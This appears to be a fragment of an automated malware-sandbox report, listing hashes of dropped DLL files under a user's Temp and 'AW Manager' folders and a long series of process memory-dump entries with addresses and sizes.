                                                                                                                • \Users\Admin\AppData\Local\Temp\install.dll
                                                                                                                  MD5

                                                                                                                  b29f18a79fee5bd89a7ddf3b4be8aa23

                                                                                                                  SHA1

                                                                                                                  0396814e95dd6410e16f8dd0131ec492718b88da

                                                                                                                  SHA256

                                                                                                                  9d4eac47f833f3f02f2f1c295c91928f55e2e5ac1189743ffff680f4f745950e

                                                                                                                  SHA512

                                                                                                                  f47861ceb9f73ea9ff74d6c65b363005b6931086ae36a25599bf644649f84ff1769c78cb7fd48a51352baf28ef7d3f1dd36414bb15365ed04605c488d11d08cd

                                                                                                                • \Users\Admin\AppData\Local\Temp\is-POOCH.tmp\idp.dll
                                                                                                                  MD5

                                                                                                                  8f995688085bced38ba7795f60a5e1d3

                                                                                                                  SHA1

                                                                                                                  5b1ad67a149c05c50d6e388527af5c8a0af4343a

                                                                                                                  SHA256

                                                                                                                  203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006

                                                                                                                  SHA512

                                                                                                                  043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

                                                                                                                • \Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\System.dll
                                                                                                                  MD5

                                                                                                                  2e025e2cee2953cce0160c3cd2e1a64e

                                                                                                                  SHA1

                                                                                                                  dec3da040ea72d63528240598bf14f344efb2a76

                                                                                                                  SHA256

                                                                                                                  d821a62802900b068dcf61ddc9fdff2f7ada04b706815ab6e5038b21543da8a5

                                                                                                                  SHA512

                                                                                                                  3cafce382b605a68e5a3f35f95b32761685112c5a9da9f87b0a06ec13da4155145bd06ffb63131bf87c3dc8bd61cb085884c5e78c832386d70397e3974854860

                                                                                                                • \Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
                                                                                                                  MD5

                                                                                                                  858c99cc729be2db6f37e25747640333

                                                                                                                  SHA1

                                                                                                                  69070df2849c1373fae9a4b4a884f14fd8ae39f1

                                                                                                                  SHA256

                                                                                                                  d4f839922c901906f549c687ccc58a010861a6a006a15c32e1a7f2e3d703b4d9

                                                                                                                  SHA512

                                                                                                                  f53e00bbedba0edbc363589a2be76ac836915b95d8e887bf5ee4080f34d773a19d9dd43e715569ea21f85a9434de2a16b51c52b00afd89d268bfc929e1e8e695

                                                                                                                • \Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
                                                                                                                  MD5

                                                                                                                  858c99cc729be2db6f37e25747640333

                                                                                                                  SHA1

                                                                                                                  69070df2849c1373fae9a4b4a884f14fd8ae39f1

                                                                                                                  SHA256

                                                                                                                  d4f839922c901906f549c687ccc58a010861a6a006a15c32e1a7f2e3d703b4d9

                                                                                                                  SHA512

                                                                                                                  f53e00bbedba0edbc363589a2be76ac836915b95d8e887bf5ee4080f34d773a19d9dd43e715569ea21f85a9434de2a16b51c52b00afd89d268bfc929e1e8e695

                                                                                                                • memory/572-141-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/572-130-0x0000000000000000-mapping.dmp
                                                                                                                • memory/644-148-0x0000000002980000-0x0000000002982000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/644-145-0x0000000000000000-mapping.dmp
                                                                                                                • memory/644-154-0x0000000002985000-0x0000000002987000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/644-151-0x0000000002984000-0x0000000002985000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/644-150-0x0000000002982000-0x0000000002984000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/924-262-0x00000202441A0000-0x0000020244210000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/1020-222-0x000002E863940000-0x000002E8639B0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/1076-252-0x0000021D3B050000-0x0000021D3B0C0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/1188-368-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1188-118-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1188-120-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/1204-253-0x0000029D64960000-0x0000029D649D0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/1324-258-0x000001360C6A0000-0x000001360C710000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/1428-243-0x000001239F470000-0x000001239F4E0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/1440-116-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  172KB

                                                                                                                • memory/1904-248-0x000001F5DF350000-0x000001F5DF3C0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/1968-369-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2112-142-0x0000000002D90000-0x0000000002D92000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/2112-133-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2192-230-0x000001670B210000-0x000001670B280000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2196-319-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2432-241-0x000001CD9E7B0000-0x000001CD9E820000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2464-229-0x0000028B80FD0000-0x0000028B81040000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2664-210-0x00000251E69A0000-0x00000251E69EB000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  300KB

                                                                                                                • memory/2664-218-0x00000251E6A70000-0x00000251E6AE0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2744-264-0x000001F247B50000-0x000001F247BC0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2756-272-0x0000020EEFD80000-0x0000020EEFDF0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/2776-304-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2780-137-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2780-143-0x0000000002FE0000-0x0000000002FE2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/2780-149-0x0000000002FE2000-0x0000000002FE4000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/2780-152-0x0000000002FE5000-0x0000000002FE6000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2892-128-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  88KB

                                                                                                                • memory/2892-126-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2904-325-0x0000000005150000-0x0000000005151000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2904-340-0x0000000008930000-0x0000000008931000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2904-334-0x0000000007730000-0x0000000007731000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2904-335-0x0000000008060000-0x0000000008061000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2904-355-0x00000000073F3000-0x00000000073F4000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2904-336-0x0000000007760000-0x0000000007761000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2904-353-0x00000000097F0000-0x00000000097F1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2904-352-0x0000000009890000-0x0000000009891000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2904-337-0x00000000080D0000-0x00000000080D1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2904-328-0x0000000007A30000-0x0000000007A31000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2904-322-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2904-330-0x00000000073F2000-0x00000000073F3000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2904-326-0x00000000073F0000-0x00000000073F1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2904-339-0x0000000008490000-0x0000000008491000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/2904-338-0x0000000008440000-0x0000000008441000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/3008-316-0x0000000005650000-0x0000000005667000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  92KB

                                                                                                                • memory/3220-125-0x0000000000F80000-0x0000000000F82000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/3220-122-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3728-170-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3764-364-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3924-367-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3940-359-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3940-365-0x0000000000D83000-0x0000000000D84000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/3940-362-0x0000000000D80000-0x0000000000D81000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/3940-363-0x0000000000D82000-0x0000000000D83000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4144-187-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4180-173-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4220-155-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4236-341-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4344-317-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4356-176-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4372-188-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4440-309-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4440-192-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4464-202-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4472-358-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4492-160-0x0000000002DA0000-0x0000000002DA2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4492-179-0x0000000002DA4000-0x0000000002DA5000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4492-156-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4560-159-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4644-315-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4680-182-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4688-209-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4704-370-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4764-224-0x0000021E0C600000-0x0000021E0C670000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  448KB

                                                                                                                • memory/4764-207-0x00007FF628C74060-mapping.dmp
                                                                                                                • memory/4764-296-0x0000021E0EB00000-0x0000021E0EC01000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  1.0MB

                                                                                                                • memory/4784-161-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4816-162-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4816-166-0x00000000008C0000-0x00000000008D2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  72KB

                                                                                                                • memory/4816-165-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/4832-196-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4900-191-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4932-206-0x0000000004A83000-0x0000000004B84000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  1.0MB

                                                                                                                • memory/4932-197-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4932-212-0x00000000049E0000-0x0000000004A3C000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  368KB

                                                                                                                • memory/4952-184-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5020-167-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5116-284-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5116-295-0x00000000004C0000-0x00000000004CC000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  48KB

                                                                                                                • memory/5124-287-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5164-280-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5180-361-0x00000000072B3000-0x00000000072B4000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/5180-357-0x00000000072B2000-0x00000000072B3000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/5180-356-0x00000000072B0000-0x00000000072B1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/5180-354-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5188-310-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5240-223-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5356-281-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5396-234-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5456-333-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5520-360-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5548-292-0x0000000000402F68-mapping.dmp
                                                                                                                • memory/5548-291-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  48KB

                                                                                                                • memory/5700-366-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5756-302-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  64KB

                                                                                                                • memory/5756-303-0x00000000005D0000-0x00000000005E2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  72KB

                                                                                                                • memory/5756-298-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5768-332-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5784-267-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5796-288-0x0000000002C90000-0x0000000002DDA000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  1.3MB

                                                                                                                • memory/5796-289-0x0000000000400000-0x0000000002BF4000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  40.0MB

                                                                                                                • memory/5796-268-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5804-300-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5844-327-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5900-273-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5956-371-0x0000000000000000-mapping.dmp
                                                                                                                • memory/5980-274-0x0000000000000000-mapping.dmp
                                                                                                                • memory/6064-276-0x0000000000000000-mapping.dmp
                                                                                                                • memory/6076-277-0x0000000000000000-mapping.dmp